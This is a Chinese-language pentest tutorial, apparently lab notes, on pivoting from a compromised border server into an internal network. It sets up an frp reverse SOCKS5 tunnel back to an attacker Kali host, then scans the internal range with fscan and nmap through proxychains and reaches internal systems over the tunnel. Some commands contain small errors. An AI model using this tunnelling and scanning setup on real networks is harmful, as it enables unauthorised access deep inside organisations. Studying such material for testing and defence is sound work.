文章目录
背景介绍
- 背景介绍
- frp一层代理(反向)
- 客户端 (client)
- 服务端(client)
- 测试连接
- 摘抄
假设:目前已获取边界服务器(192.168.0.104)的权限 实现:通过frp做反向代理,实现192.168.0.107外网主机–成功访问内网oa系统–内网192.168.52.30系统 frp下载地址 https://github.com/fatedier/frp/releases
frp一层代理(反向) 客户端 (client)ubuntu-web1(192.168.0.104)
配置远程连接的IP地址(192.168.0.107),通过tcp协议的socks5的7777端口进行通信传输
frpc.ini
------------------------------------
[common]
server_addr = 192.168.0.107
server_port = 7000
[plugin_socks5]
type = tcp #协议
remote_port = 7777 #指定远程服务器的端口
plugin = socks5
------------------------------------
启动客户端
chmod +x frpc
chmod +x frpc.ini
exectue -f ./frpc -c ./frpc.ini
kali(192.168.0.107)
frps.ini
-----------------------------------
[common]
bind_port = 7000 #必要,frp服务端端口
------------------------------------
启动服务端
chmod +x frps
chmod +x frps.ini
./frps -c ./frps.ini
kali本地添加proxy配置
vim /etc/proxychains4.conf
----------------------------------
socks5 192.168.0.107 7777
----------------------------------
第一步 使用fscan 进行扫描,发现主机 https://github.com/shadow1ng/fscan/releases/tag/1.8.1
./fscan_amd64 -h 192.168.52.0/24
使用nmap就行扫描
proxychains nmap -Pn -sT -sV -F -O 192.168.52.30
第二步 浏览器开启代理,访问内网系统 
第三步 burp开启代理,抓包访问内网系统 
第四步 使用代理,远程桌面内网主机 
